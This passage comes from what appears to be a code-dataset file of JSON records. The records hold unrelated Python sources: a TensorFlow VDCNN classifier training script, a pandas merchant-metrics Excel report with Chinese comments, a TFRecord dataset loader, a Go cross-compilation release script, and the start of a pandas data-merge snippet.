tf.get_variable('w', [self.flatten.get_shape()[1], fc_units],\n initializer=he_normal, regularizer=regularizer)\n b = tf.get_variable('b', [fc_units], initializer=tf.constant_initializer(.1))\n out = tf.matmul(self.flatten, w) + b\n self.fc1 = 
tf.nn.relu(out)\n\n # fc2\n with tf.variable_scope('fc2'):\n w = tf.get_variable('w', [self.fc1.get_shape()[1], num_classes],\n initializer=he_normal, regularizer=regularizer)\n b = tf.get_variable('b', [num_classes], initializer=tf.constant_initializer(.1))\n\n self.scores = tf.matmul(self.fc1, w) + b\n self.prob = tf.sigmoid(self.scores)\n\n # Calculate mean cross-entropy loss\n with tf.name_scope(\"loss\"):\n self.bce_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.scores,\n labels=self.input_y))\n # with tf.name_scope(\"train\"):\n # self.train_step = tf.train.AdamOptimizer(lr).minimize(self.bce_loss)\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n\n # DONOTCHANGE: They are reserved for nsml\n args.add_argument('--mode', type=str, default='train')\n args.add_argument('--pause', type=int, default=0)\n args.add_argument('--iteration', type=str, default='0')\n\n # User options\n # model's specification (hyper-parameters)\n args.add_argument('--output', type=int, default=1)\n args.add_argument('--epochs', type=int, default=50 + 1)\n args.add_argument('--batch', type=int, default=128) # best\n args.add_argument('--embeds', type=int, default=16) # best\n args.add_argument('--depth', type=int, default=29) # best\n args.add_argument('--shortcut', type=bool, default=True) # best\n args.add_argument('--strmaxlen', type=int, default=1024) #\n args.add_argument('--fc_units', type=int, default=1024) #\n args.add_argument('--threshold', type=float, default=0.5)\n args.add_argument('--lr', type=float, default=9e-3)\n config = args.parse_args()\n\n if not HAS_DATASET and not IS_ON_NSML: # It is not running on nsml\n DATASET_PATH = '../sample_data/kin/'\n\n character_size = 251\n # VDCNN Model\n textcnn = TextCNN(depth=config.depth,\n embedding_size=config.embeds, sequence_max_length=config.strmaxlen,\n optional_shortcut=config.shortcut,\n fc_units=config.fc_units,\n lr=config.lr)\n x = textcnn.input_x\n y_ = textcnn.input_y\n 
is_train = textcnn.is_training\n prob = textcnn.prob\n bce_loss = textcnn.bce_loss\n # train_step = textcnn.train_step\n\n sess = tf.Session()\n\n # DONOTCHANGE: Reserved for nsml\n bind_model(sess=sess, config=config)\n\n # DONOTCHANGE: Reserved for nsml\n if config.pause:\n nsml.paused(scope=locals())\n\n if config.mode == 'train':\n dataset = KinQueryDataset(DATASET_PATH, config.strmaxlen)\n\n dataset_len = len(dataset)\n one_batch_size = dataset_len // config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n learning_rate = tf.train.exponential_decay(config.lr, global_step,\n config.epochs * one_batch_size, 0.95, staircase=True)\n # train_step = tf.train.AdamOptimizer(learning_rate).minimize(bce_loss)\n optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n gradients, variables = zip(*optimizer.compute_gradients(bce_loss))\n gradients, _ = tf.clip_by_global_norm(gradients, 7.0)\n train_op = optimizer.apply_gradients(zip(gradients, variables), global_step=global_step)\n\n sess.run(tf.global_variables_initializer())\n\n for epoch in range(config.epochs):\n avg_loss = 0.\n for i, (data, labels) in enumerate(_batch_loader(dataset, config.batch)):\n _, loss, _ = sess.run([train_op, bce_loss, global_step],\n feed_dict={\n x: data,\n y_: labels,\n is_train: True,\n })\n\n _ = tf.train.global_step(sess, global_step)\n\n print('Batch : ', i + 1, '/', one_batch_size, ', BCE in this minibatch: ', float(loss))\n avg_loss += float(loss)\n\n print('epoch:', epoch, ' train_loss:', float(avg_loss / one_batch_size))\n\n nsml.report(summary=True, scope=locals(), epoch=epoch, epoch_total=config.epochs,\n train__loss=float(avg_loss / one_batch_size), step=epoch)\n\n # DONOTCHANGE (You can decide how often you want to save the model)\n nsml.save(epoch)\n\n # [(0.3, 0), (0.7, 1), ... 
]\n elif config.mode == 'test_local':\n with open(os.path.join(DATASET_PATH, 'train/train_data'), 'rt', encoding='utf-8') as f:\n queries = f.readlines()\n res = []\n for batch in _batch_loader(queries, config.batch):\n temp_res = nsml.infer(batch)\n res += temp_res\n\n print(res)\n","sub_path":"kin/vdcnn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412286545","text":"\"\"\"\n计算各城市商家运营数据情况\n\"\"\"\nimport pandas as pd\nfrom datetime import datetime\ntimes = datetime.now().strftime('%Y-%m-%d')\n\nfilename = '沙县11月各商家运营数据.xlsx'\nsheet_name = pd.ExcelFile(filename).sheet_names\n# print(sheet_name) # ['沙县', '安陆', '丹江口'] 返回值是列表\nfor sheet in sheet_name:\n if sheet == '沙县':\n gmv = 2160776.78\n order = 54250\n agent_money = 182178.55\n different_rate = 0.0107\n df01 = pd.read_excel(filename, sheet)\n # df[['col2', 'col3']] = df[['col2', 'col3']].apply(pd.to_numeric)\n # 将百分数转化为小数\n # df01 = df01.where(df01.notnull(), 0) # 把所有为空的列的值改为None\n df01.ix[df01['非顾客原因异常订单率'] == '-', '非顾客原因异常订单率'] = 0\n df01['非顾客原因异常订单率'] = df01['非顾客原因异常订单率'].str.strip('%').astype(float) / 100\n # print(df01['非顾客原因异常订单率'])\n df01 = df01.drop(['是否有双证'], axis=1) # 删除列\n df01 = df01.drop(['是否签署SD合作协议'], axis=1) # 删除列\n df01 = df01.drop(['一级品类'], axis=1) # 删除列\n df01 = df01.drop(['二级品类'], axis=1) # 删除列\n df01 = df01.drop(['代理商名称'], axis=1) # 删除列\n df01 = df01.drop(['商家ID'], axis=1) # 删除列\n df01 = df01.drop(['配送方式'], axis=1) # 删除列\n df01 = df01.drop(['实际支付交易额'], axis=1) # 删除列\n # df01 = df01.drop(['配送方式'], axis=1) # 删除列\n df01['原价交易额贡献占比'] = 0 # 可以增加新的列\n df01['原价交易额贡献占比'] = df01.apply(lambda x: df01['原价交易额']/gmv)\n df01['原价交易额贡献占比'] = df01['原价交易额贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['订单数贡献占比'] = 0\n df01['订单数贡献占比'] = df01.apply(lambda x: df01['订单数'] / order)\n df01['订单数贡献占比'] = df01['订单数贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['代补金额贡献占比'] = 0\n 
df01['代补金额贡献占比'] = df01.apply(lambda x: df01['代理商补贴金额'] / agent_money)\n df01['代补金额贡献占比'] = df01['代补金额贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['非异贡献占比'] = 0\n df01['非异贡献占比'] = df01.apply(lambda x: df01['非顾客原因异常订单率'] / different_rate)\n df01['非异贡献占比'] = df01['非异贡献占比'].apply(lambda x: format(x, '.2%'))\n # 排序 一定要记得先将数据转化成 int类型\n # df01.sort_values([\"原价交易额贡献占比\", \"订单数贡献占比\", '代补金额贡献占比', '非异贡献占比'], ascending=False)\n df01[\"订单数\"] = df01[\"订单数\"].astype(\"int\") # 强制转化类型\n # inplace表示再排序的时候是否生成一个新的dataframe 结构\n df01.sort_values([\"原价交易额贡献占比\"], inplace=True, ascending=False)\n print(df01)\n df01 = df01.head(30)\n df01.set_index(['外卖组织结构'], inplace=True)\n url = 'C:/Users/王颖/Desktop/'\n df01.to_excel(url + '沙县11月各商家数据明细.xlsx')\n # bd_name = df01['BD名称'].get_values()\n # BD_name = list(bd_name) # 直接转列表\n # BD_name_list = set(BD_name)\n # BD_name_list = list(BD_name_list)\n # row_num = len(BD_name_list)\n # city_name = list(df01['外卖组织结构'])[0]\n # k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n # city_list = [city_name]*row_num # 生成多少个元素的列表\n # list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n # order_list = []\n # bus_refuse_order = []\n # bus_no_order = []\n # n = 0\n # for field in list01:\n # n += 1\n # for name in BD_name_list:\n # f = df01.loc[df01['BD名称'] == name][field].get_values()\n # f = list(f)\n # order_num = sum(f)\n # if n == 1:\n # order_list.append(order_num)\n # if n == 2:\n # bus_refuse_order.append(order_num)\n # if n == 3:\n # bus_no_order.append(order_num)\n # print(order_list, bus_refuse_order, bus_no_order)\n # d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n # '商家不接单订单数': bus_no_order}\n # labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n # df01 = pd.DataFrame(d)\n # # refuse_lv = df['商家拒单订单数']/df['订单数'] 整列整除\n # # print(refuse_lv)\n # df01.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n # df01.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n # df01.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 
可以对新插入的列进行操作\n # # 对数据的格式进行转换\n # df01['拒单率'] = df01['拒单率'].apply(lambda x: format(x, '.2%'))\n # df01['不接单率'] = df01['不接单率'].apply(lambda x: format(x, '.2%'))\n # df01['业务端非异率'] = df01['业务端非异率'].apply(lambda x: format(x, '.2%'))\n # df01.set_index(['城市'], inplace=True)\n# if sheet == '安陆':\n# df02 = pd.read_excel(filename, sheet)\n# bd_name = df02['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df02['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df02.loc[df02['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# df02 = pd.DataFrame(d)\n# df02.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df02.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df02.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df02['拒单率'] = df02['拒单率'].apply(lambda x: format(x, '.2%'))\n# df02['不接单率'] = df02['不接单率'].apply(lambda x: format(x, '.2%'))\n# df02['业务端非异率'] = df02['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df02.set_index(['城市'], inplace=True)\n# if sheet == '丹江口':\n# df03 = pd.read_excel(filename, sheet)\n# bd_name = df03['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# 
BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df03['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df03.loc[df03['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df03 = pd.DataFrame(d)\n# df03.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df03.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df03.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df03['拒单率'] = df03['拒单率'].apply(lambda x: format(x, '.2%'))\n# df03['不接单率'] = df03['不接单率'].apply(lambda x: format(x, '.2%'))\n# df03['业务端非异率'] = df03['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df03.set_index(['城市'], inplace=True)\n# if sheet == '桑植':\n# df04 = pd.read_excel(filename, sheet)\n# bd_name = df04['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df04['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order 
= []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df04.loc[df04['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df04 = pd.DataFrame(d)\n# df04.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df04.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df04.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df04['拒单率'] = df04['拒单率'].apply(lambda x: format(x, '.2%'))\n# df04['不接单率'] = df04['不接单率'].apply(lambda x: format(x, '.2%'))\n# df04['业务端非异率'] = df04['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df04.set_index(['城市'], inplace=True)\n# if sheet == '孝昌':\n# df05 = pd.read_excel(filename, sheet)\n# bd_name = df05['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df05['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df05.loc[df05['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, 
bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df05 = pd.DataFrame(d)\n# df05.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df05.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df05.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df05['拒单率'] = df05['拒单率'].apply(lambda x: format(x, '.2%'))\n# df05['不接单率'] = df05['不接单率'].apply(lambda x: format(x, '.2%'))\n# df05['业务端非异率'] = df05['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df05.set_index(['城市'], inplace=True)\n#\n# # 将多个dataframe数据写入同一个Excel的不同sheet中\n# url = 'C:/Users/王颖/Desktop/changzhoufeiniao_工作表/'\n# with pd.ExcelWriter(url+\"BD商家非异率统计表.xlsx\") as writer:\n# df01.to_excel(writer, sheet_name='沙县')\n# df02.to_excel(writer, sheet_name='安陆')\n# df03.to_excel(writer, sheet_name='丹江口')\n# df04.to_excel(writer, sheet_name='桑植')\n# df05.to_excel(writer, sheet_name='孝昌')\n\n\n\n","sub_path":"execl_04.py","file_name":"execl_04.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78837693","text":"from .transforms import DataAugmenter\nimport threading\n\nimport numpy as np\nfrom glob import glob\nimport tensorflow as tf\nimport cv2\nimport os\nfrom tqdm import tqdm\nimport itertools\n# from imblearn.keras import BalancedBatchGenerator, balanced_batch_generator\n# from imblearn.over_sampling import RandomOverSampler\nfrom tensorflow.keras.utils import Sequence, to_categorical\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n# CLASS_NAMES = ['unknown', 'person', 'lie_down', ]\n\n\nclass Dataprocessor:\n def __init__(self, args):\n self.args = args\n self.classes = self.read_classes(args.TRAIN_DIR)\n self.total_train = self.make_tfrecord(args.TRAIN_DIR)\n self.total_val = 
self.make_tfrecord(args.VAL_DIR)\n self.train_tfrecords = self.load_tfrecord(args.TRAIN_DIR)\n self.train_tfrecords = self.create_dataset(self.train_tfrecords)\n self.val_tfrecords = self.load_tfrecord(args.VAL_DIR)\n self.val_tfrecords = self.create_dataset(self.val_tfrecords, True)\n\n @property\n def train_length(self):\n return self.total_train // self.args.BATCH_SIZE\n\n @property\n def val_length(self):\n return self.total_val // self.args.BATCH_SIZE\n\n def create_dataset(self, tfrecords, is_val=False):\n augmentation = DataAugmenter(self.args, is_val)\n if self.args.MODEL.AUTOML:\n dirs = self.args.TRAIN_DIR if not is_val else self.args.VAL_DIR\n train_gen = tf.keras.preprocessing.image.ImageDataGenerator(preprocessing_function=augmentation)\n data_gens = [train_gen.flow_from_directory(\n directory=d,\n batch_size=self.args.BATCH_SIZE,\n shuffle=True,\n target_size=(self.args.DATA.SIZE[1], self.args.DATA.SIZE[0]),\n ) for d in dirs]\n data_gens = itertools.chain(*data_gens)\n\n def callable_iterator(generator):\n for img_batch, targets_batch in generator:\n yield img_batch, targets_batch\n\n return tf.data.Dataset.from_generator(lambda: callable_iterator(data_gens), output_types=(tf.float32, tf.float32))\n\n else:\n if not is_val:\n return tfrecords.repeat()\\\n .shuffle(self.args.DATA.SHUFFLE_SIZE)\\\n .map(augmentation)\\\n .batch(self.args.BATCH_SIZE)\\\n .prefetch(buffer_size=AUTOTUNE)\n else:\n return tfrecords.map(augmentation)\\\n .batch(self.args.BATCH_SIZE)\\\n .prefetch(buffer_size=AUTOTUNE)\n\n def read_classes(self, paths):\n if len(self.args.MODEL.CLASSES) > 1 and self.args.MODEL.CLASSES[0] != None:\n # print(self.args.MODEL.CLASSES)\n return self.args.MODEL.CLASSES\n print(f'read classes from data path: {paths} ..')\n dirs = set()\n for path in paths:\n classes = [os.path.basename(f) for f in glob(os.path.join(path, '*')) if os.path.isdir(f)]\n # print(classes)\n dirs = dirs.union(set(classes))\n \n dirs = sorted(list(dirs))\n assert 
self.args.MODEL.NUM_CLASSES == len(dirs), f'only {len(dirs)} class exists!'\n assert len(dirs) > 1, f'only {len(dirs)} class exists!'\n print(f'{len(dirs)} classes exist')\n for name in dirs:\n print(name)\n \n print('Loading class finished!')\n return dirs\n\n def make_tfrecord(self, paths):\n lengths = []\n for path in paths:\n record_file = os.path.join(path, f'data_{len(self.classes)}.tfrecords')\n if os.path.exists(record_file):\n with open(record_file + f'_{len(self.classes)}.length', 'r') as l:\n lengths.append(int(l.readline()))\n continue\n \n files = [f for f in glob(os.path.join(path, '*/*')) if f.endswith('jpg') or f.endswith('.png')]\n # print(os.path.join(path, '*/*.{jpg,png}'))\n # print(files)\n np.random.shuffle(files)\n print('making tfrecords..')\n # options = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)\n length = 0\n with tf.io.TFRecordWriter(record_file) as writer:\n for f in tqdm(files):\n image_string = open(f, 'rb').read()\n label = os.path.basename(os.path.dirname(f))\n tf_example = self.__make_feature_from(image_string, label)\n if tf_example == None:\n continue\n length += 1\n writer.write(tf_example.SerializeToString())\n lengths.append(length)\n with open(record_file + f'_{len(self.classes)}.length', 'w') as l:\n l.write(str(length))\n\n return sum(lengths)\n\n def __make_feature_from(self, image_string, label):\n try:\n label = self.classes.index(label)\n except:\n return None\n image_shape = tf.image.decode_jpeg(image_string).shape\n if isinstance(image_string, type(tf.constant(0))):\n image_string = image_string.numpy()\n h, w, _ = image_shape\n feature = {\n 'height': tf.train.Feature(int64_list=tf.train.Int64List(value=[h])),\n 'width': tf.train.Feature(int64_list=tf.train.Int64List(value=[w])),\n 'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[label])),\n 'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_string])),\n }\n return 
tf.train.Example(features=tf.train.Features(feature=feature))\n\n def load_tfrecord(self, paths):\n records = []\n image_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image': tf.io.FixedLenFeature([], tf.string),\n }\n record_paths = [os.path.join(path, f'data_{len(self.classes)}.tfrecords') for path in paths]\n dataset = tf.data.TFRecordDataset(record_paths)\n\n def _parse_image_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n example = tf.io.parse_single_example(example_proto, image_feature_description)\n # image = tf.io.decode_raw(example['image'], tf.uint8)\n image = tf.image.decode_jpeg(example['image'], channels=3, dct_method='INTEGER_ACCURATE')\n image = tf.reshape(image, [example['height'], example['width'], 3])\n return image, example['label']\n\n return dataset.map(_parse_image_function, num_parallel_calls=AUTOTUNE)\n\n\n# def image_resize(image, size):\n# width, height = size\n# # initialize the dimensions of the image to be resized and\n# # grab the image size\n# origin_width = width\n# origin_height = height\n# dim = None\n# (h, w) = image.shape[:2]\n\n# if h > w:\n# width = None\n# else:\n# height = None\n\n# # if both the width and height are None, then return the\n# # original image\n# # if width is None and height is None:\n# # return image\n\n# # check to see if the width is None\n# if width is None:\n# # calculate the ratio of the height and construct the\n# # dimensions\n# r = height / float(h)\n# dim = (int(w * r), height)\n\n# # otherwise, the height is None\n# else:\n# # calculate the ratio of the width and construct the\n# # dimensions\n# r = width / float(w)\n# dim = (width, int(h * r))\n# # resize the image\n# resized = cv2.resize(image, dim)\n\n# # return the resized image\n# resized = pad_size(resized, origin_width, origin_height)\n# return resized\n\n\n# def 
pad_size(image, width, height):\n# (h, w) = image.shape[:2]\n# # print('vertical: ', (height - h), ' horizontal: ', width-w)\n# top, bottom = (height - h) // 2, (height - h) - ((height - h) // 2)\n# left, right = (width - w) // 2, (width - w) - ((width - w) // 2)\n# # print((height - h), ' ', 0, ' ', (width - w), ' ')\n# # print('top: ', top, ' bottom: ', bottom, ' left: ', left, ' right: ', right)\n# image = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=0)\n# return image\n\n\n# def decode_img(img, mean, std, size):\n# # print('*'*50)\n# # print(img)\n# # convert the compressed string to a 3D uint8 tensor\n# img = cv2.imread(img[0])#.astype(float)\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n# img = image_resize(img, size).astype(float)\n# img = (img - mean) / std\n\n# # print(img.shape)\n# # img = tf.io.read_file(img[0])\n# # img = tf.image.decode_jpeg(img, channels=3)\n# # # Use `convert_image_dtype` to convert to floats in the [0,1] range.\n# # img = tf.image.convert_image_dtype(img, tf.float32).eval()\n# # resize the image to the desired size.\n# # print(img.shape)\n# # print('8'*80)\n# return img\n\n\n# def to_onehot(index):\n# result = np.zeros([len(CLASS_NAMES)])\n# result[index] = 1\n# return result\n\n\n# def data_ready(path):\n# images = sorted(glob(os.path.join(path, '*/*.jpg')))\n# return np.array(images).reshape(-1, 1), np.array([CLASS_NAMES.index(i.split('/')[-2]) for i in images])\n\n\n# class ValGenerator(Sequence):\n# def __init__(self, x, y, mean, std, size):\n# self.lock = threading.Lock()\n# self.x = x\n# self.y = y\n# self.datagen = ImageDataGenerator(\n# rescale=1/255)\n# self._shape = x.shape\n# self.mean = np.array(mean).reshape(1, 1, -1)\n# self.std = np.array(std).reshape(1, 1, -1)\n# self.size = size\n# # self.gen, self.steps_per_epoch = balanced_batch_generator(x.reshape(-1, 1), y.reshape(-1, 1), sampler=RandomOverSampler(), batch_size=self.batch_size, keep_sparse=True)\n\n# def __len__(self):\n# 
return self._shape[0]\n\n# def __getitem__(self, idx):\n# with self.lock:\n# x_batch, y_batch = self.x[idx:idx+1], self.y[idx: idx+1]\n# x_batch, y_batch = np.stack([decode_img(i, self.mean, self.std, self.size) for i in x_batch]), to_categorical(y_batch.reshape(-1), num_classes=3)\n# # print(x_batch.shape)\n# # x_batch = x_batch.reshape(-1, *self._shape[1:])\n# return self.datagen.flow(x_batch, y_batch, batch_size=1).next()\n\n\n# class CustomBalancedDataGenerator(Sequence):\n# \"\"\"ImageDataGenerator + RandomOversampling\"\"\"\n# def __init__(self, x, y, batch_size, mean, std, size):\n# self.lock = threading.Lock()\n# self.datagen = ImageDataGenerator(\n# rescale=1/255,\n# # featurewise_center=True,\n# # featurewise_std_normalization=True,\n# rotation_range=3,\n# width_shift_range=0.2,\n# height_shift_range=0.2,\n# horizontal_flip=True)\n# self.size = size\n# self.batch_size = batch_size\n# self._shape = x.shape\n# self.mean = np.array(mean).reshape(1, 1, -1)\n# self.std = np.array(std).reshape(1, 1, -1)\n# self.gen, self.steps_per_epoch = balanced_batch_generator(x.reshape(-1, 1), y.reshape(-1, 1), sampler=RandomOverSampler(), batch_size=self.batch_size, keep_sparse=True)\n\n# def __len__(self):\n# return self._shape[0] // self.batch_size\n\n# def __getitem__(self, idx):\n# with self.lock:\n# x_batch, y_batch = self.gen.__next__()\n# x_batch, y_batch = np.stack([decode_img(i, self.mean, self.std, self.size) for i in x_batch]), to_categorical(y_batch.reshape(-1), num_classes=3)\n# return self.datagen.flow(x_batch, y_batch, batch_size=self.batch_size).next()\n\ndef build_data(cfg):\n return Dataprocessor(cfg)\n # augment = Augmentor(True)\n # X, y = [], []\n # for folder in cfg.TRAIN_DIR:\n # data = data_ready(folder)\n # X.append(data[0])\n # y.append(data[1])\n # X = np.concatenate(X, axis=0)\n # y = np.concatenate(y, axis=0)\n\n # train_batches = CustomBalancedDataGenerator(\n # X, y, batch_size=cfg.BATCH_SIZE, mean=cfg.DATA.MEAN, std=cfg.DATA.STD, 
size=cfg.DATA.SIZE)\n \n # X, y = [], []\n # for folder in cfg.VAL_DIR:\n # data = data_ready(folder)\n # X.append(data[0])\n # y.append(data[1])\n # X = np.concatenate(X, axis=0)\n # y = np.concatenate(y, axis=0)\n # # X, y = data_ready(cfg.VAL_DIR)\n # val_batches = ValGenerator(X, y, mean=cfg.DATA.MEAN, std=cfg.DATA.STD, size=cfg.DATA.SIZE)\n ","sub_path":"classification/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462295170","text":"#!/usr/bin/python3\n\nimport subprocess as sh\nfrom os import environ, mkdir\n\n\nVARIANTS = [\n ('darwin', 'amd64'),\n ('linux', '386'),\n ('linux', 'amd64'),\n ('windows', '386'),\n ('windows', 'amd64'),\n]\n\n\ndef extension(os):\n if os == 'windows':\n return '.exe'\n return ''\n\n\ndef executable_name(os, arch):\n return f'./bin/{os}_{arch}_sema{extension(os)}'\n\n\ndef compile():\n for os, arch in VARIANTS:\n environ['GOOS'] = os\n environ['GOARCH'] = arch\n sh.call(['go', 'build', '-o', executable_name(os, arch), '.'])\n\n\nif __name__ == '__main__':\n try:\n mkdir('bin')\n except FileExistsError:\n pass\n compile()\n","sub_path":"release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628510607","text":"import pandas as pd\n\n\ndef read_dataframes():\n train_df = pd.read_csv('../weekly_sales.csv')\n features_df = pd.read_csv('../features.csv')\n stores_df = pd.read_csv('../stores.csv')\n return train_df, features_df, stores_df\n\n\ntrain_df, features_df, stores_df = read_dataframes()\nmerged_features = features_df.merge(stores_df, on='Store')\n# -----------------------------\n\nfeatures = ['Store', 'Date', 'IsHoliday']\nfinal_dataset = train_df.merge(merged_features, on=features)\nfinal_dataset = 
